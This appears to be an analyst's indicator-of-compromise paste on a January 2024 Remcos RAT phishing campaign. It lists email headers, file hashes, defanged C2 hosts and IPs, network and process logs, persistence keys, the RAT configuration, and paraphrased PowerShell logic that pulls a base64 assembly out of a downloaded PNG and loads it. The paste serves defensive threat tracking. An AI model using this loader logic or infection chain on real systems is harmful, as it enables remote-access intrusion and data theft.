VRad

#remcos_250124

Jan 25th, 2024 (edited)
  1. #IOC #OptiData #VR #remcos #RAT #stego #pngbase64 #RegAsm #PowerShell
  2.  
  3. https://pastebin.com/cud9xwfs
  4.  
  5. previous_contact:
  6. 19/01/24 https://pastebin.com/EvXHfZUB
  7. 18/01/24 https://pastebin.com/FL2fX362
  8. 25/12/23 https://pastebin.com/D535PVm3
  9. 21/12/23 https://pastebin.com/samYnJq6
  10. 30/11/23 https://pastebin.com/aG6XyqHN
  11. 13/11/23 https://pastebin.com/tbRpiGG5
  12. 06/02/23 https://pastebin.com/kjv5E8Au
  13.  
  14. FAQ:
  15. https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
  16.  
  17. attack_vector
  18. --------------
  19. email attach .docx (T1221) > get .doc (11882) > get .vbs > get base64 > get .png (stego) > get .txt > decode > inject RegAsm.exe > C2
  20.  
  21. # # # # # # # #
  22. email_headers
  23. # # # # # # # #
  24. Date: 25 Jan 2024 02:58:03 -0800
  25. Subject: Fw: Re: Re: Re: Confirmarea comenzii si plata
  26. From: Mert Tural<contact@ laceys_icu>
  27. Received: from laceys_icu (HELO mail0_laceys_icu) ([216_9_224_90])
  28. Message-ID: <20240125025803.5754DAE9059F10D7@ laceys_icu>
  29.  
  30. # # # # # # # #
  31. files
  32. # # # # # # # #
  33. SHA-256 e2ee9ac33c1e07a99f8cc6044f0a7b830e892fbfbfd7d6e8db916707e9c34035
  34. File name Copie de plată.docx [ Microsoft Word 2007+ ] !Template Injection
  35. File size 30.64 KB (31375 bytes)
  36.  
  37. SHA-256 1de402b1aa5fcf8a3782a2656b75dd8e943b68e181acc45ef85b32df95f2b640
  38. File name microsoftinteroird___.doc [ Rich Text Format ] !11882 EQUATION
  39. File size 64.80 KB (66353 bytes)
  40.  
  41. SHA-256 d8ee4672494c3a0141cad7cfd5ba867b85b7e6b00bec09aad83d0ead054243ae
  42. File name ISOupdate.vbs [ JavaScript ] !Detect sandbox
  43. File size 156.03 KB (159776 bytes)
  44.  
  45. SHA-256 652c8b88469fc78b55ce828bf6a7f602e8daac730470ebd7e8cd836d8c1600b9
  46. File name d3zoY [ JavaScript ] !Base64 2 PowerShell
  47. File size 47.32 KB (48457 bytes)
  48.  
  49. SHA-256 14d46f274c0a4714fd4d9156edc0f2f695b6d3c650b1e9f0d1b4f286c7caa6a1
  50. File name uwp4241942.png [ PNG image data ] !Stego Loader BASE64_START
  51. File size 17.73 MB (18594320 bytes)
  52.  
  53. SHA-256 e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042
  54. File name CNF.txt [ Reverse Base64 ] !REMCOS encoded payload
  55. File size 644.00 KB (659456 bytes)
  56.  
  57.  
  58. # # # # # # # #
  59. activity
  60. # # # # # # # #
  61.  
  62. PL_SCR wallpapercave_com /uwp/uwp4241942.png (LOADER)
  63. 172_232_189_152 /359/CNF.txt (REMCOS)
  64.  
  65. C2 top_noforabusers1_xyz : 2424 147_124_215_172 : 2424
  66.  
  67. netwrk
  68. --------------
  69. 172_67_188_27 tau_id 80 HTTP OPTIONS / HTTP/1.1 Microsoft Office Protocol Discovery
  70. 172_67_188_27 tau_id 80 HTTP OPTIONS / HTTP/1.1 Microsoft Office Protocol Discovery
  71. 172_67_188_27 443 SSLv2 Client Hello
  72. 172_67_188_27 tau_id 80 HTTP GET /ze87s HTTP/1.1 Mozilla/4.0 (MSOffice 12)
  73. 172_232_189_152 80 HTTP GET /cdf/microsoftinteroird___.doc HTTP/1.1 Mozilla/4.0 (MSOffice 12)
  74. 172_67_188_27 tau_id 80 HTTP HEAD /ze87s HTTP/1.1 Microsoft Office Existence Discovery
  75. 172_67_188_27 tau_id 80 HTTP HEAD /ze87s HTTP/1.1 Microsoft Office Existence Discovery
  76. 172_232_189_152 80 HTTP GET /359/ISOupdate.vbs HTTP/1.1
  77. 188_114_97_9 paste_ee 80 HTTP GET /d/d3zoY HTTP/1.1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  78. 188_114_97_9 paste_ee 443 TLSv1 Client Hello
  79.  
  80. 104_22_53_71 wallpapercave_com 443 TLSv1.2 Client Hello
  81. 172_232_189_152 80 HTTP GET /359/CNF.txt HTTP/1.1
  82. 147_124_215_172 2424 TLSv1.3 Client Hello
  83.  
  84. comp
  85. --------------
  86. WINWORD.EXE TCP 172_67_188_27 80 ESTABLISHED
  87. WINWORD.EXE TCP 172_67_188_27 443 ESTABLISHED
  88. WINWORD.EXE TCP 172_232_189_152 80 ESTABLISHED
  89. WScript.exe TCP 188_114_97_9 443 ESTABLISHED
  90. powershell.exe TCP 104_22_53_71 443 ESTABLISHED
  91. powershell.exe TCP 172_232_189_152 80 ESTABLISHED
  92. RegAsm.exe TCP 147_124_215_172 2424 ESTABLISHED
  93.  
  94. proc
  95. --------------
  96. C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
  97. "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  98. "C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\ISOupdate.vbs"
  99. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command ...
  100. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 172_232_189_152 /359 / CNF.txt
  101.  
  102. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" *.vbs -Destination C:\ProgramData\svch.vbs
  103. C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
  104. C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\TEMP\bitjt"
  105. C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\TEMP\llzcugmi"
  106. C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\TEMP\wfevvzxcdsr"
  107.  
  108. persist
  109. --------------
  110. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25.01.2024 13:25
  111. Path File not found: C:\ProgramData\svch.vbs.exe
  112.  
  113. drop
  114. --------------
  115. %temp%\Temporary Internet Files\Content.IE5\*\microsoftinteroird___[1].doc
  116. %temp%\Temporary Internet Files\Content.IE5\*\ze87s[1]
  117. %temp%\Temporary Internet Files\Content.IE5\*\ISOupdate[1].vbs
  118. C:\Users\operator\AppData\Roaming\ISOupdate[1].vbs
  119. %temp%\bitjt
  120. %temp%\llzcugmi
  121. %temp%\wfevvzxcdsr
  122.  
  123. # # # # # # # #
  124. additional info
  125. # # # # # # # #
  126. powershell load remcos (paraphrased script logic):
  127. --------------
  128. imageUrl = 'wallpapercave_com / uwp / uwp4241942.png'
  129. webClient = System.Net.WebClient
  130. imageBytes = DownloadData(image_Url)
  131. imageText = UTF8.GetString(image_Bytes)
  132. startFlag = '<<BASE64_START>>'; endFlag = '<<BASE64_END>>'
  133. base64Command = image_Text_Substring
  134. commandBytes = Convert ::From_Base64String
  135. loadedAssembly = : Load (command_Bytes)
  136. type = loaded_Assembly_GetType (Aspose.DrawingSpec.PkikAttrCertNB)
  137. method = Run . Invoke 172_232_189_152 / 359 / CNF.txt desativado svch C:\ProgramData\ LnkName RegAsm
  138.  
  139. remcos config
  140. --------------
  141. {
  142. "Version": "4.9.3 Pro",
  143. "Host:Port:Password": "top_noforabusers1_xyz : 2424 : 1",
  144. "Assigned name": "RemoteHost",
  145. "Connect interval": "1",
  146. "Install flag": "Disable",
  147. "Setup HKCU\\Run": "Enable",
  148. "Setup HKLM\\Run": "Enable",
  149. "Install path": "Application path",
  150. "Copy file": "remcos.exe",
  151. "Startup value": "Disable",
  152. "Hide file": "Disable",
  153. "Mutex": "Rmc-M4OLK2",
  154. "Keylog flag": "0",
  155. "Keylog path": "Application path",
  156. "Keylog file": "logs.dat",
  157. "Keylog crypt": "Disable",
  158. "Hide keylog file": "Disable",
  159. "Screenshot flag": "Disable",
  160. "Screenshot time": "10",
  161. "Take Screenshot option": "Disable",
  162. "Take screenshot title": "",
  163. "Take screenshot time": "5",
  164. "Screenshot path": "AppData",
  165. "Screenshot file": "Screenshots",
  166. "Screenshot crypt": "Disable",
  167. "Mouse option": "Disable",
  168. "Delete file": "Disable",
  169. "Audio record time": "5"
  170. }
  171. # # # # # # # #
  172. VT & Intezer
  173. # # # # # # # #
  174. https://www.virustotal.com/gui/file/e2ee9ac33c1e07a99f8cc6044f0a7b830e892fbfbfd7d6e8db916707e9c34035/details
  175. https://www.virustotal.com/gui/file/1de402b1aa5fcf8a3782a2656b75dd8e943b68e181acc45ef85b32df95f2b640/details
  176. https://www.virustotal.com/gui/file/d8ee4672494c3a0141cad7cfd5ba867b85b7e6b00bec09aad83d0ead054243ae/details
  177. https://www.virustotal.com/gui/file/652c8b88469fc78b55ce828bf6a7f602e8daac730470ebd7e8cd836d8c1600b9/details
  178. https://www.virustotal.com/gui/file/14d46f274c0a4714fd4d9156edc0f2f695b6d3c650b1e9f0d1b4f286c7caa6a1/details
  179. https://www.virustotal.com/gui/file/e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042/details
  180.  
  181. VR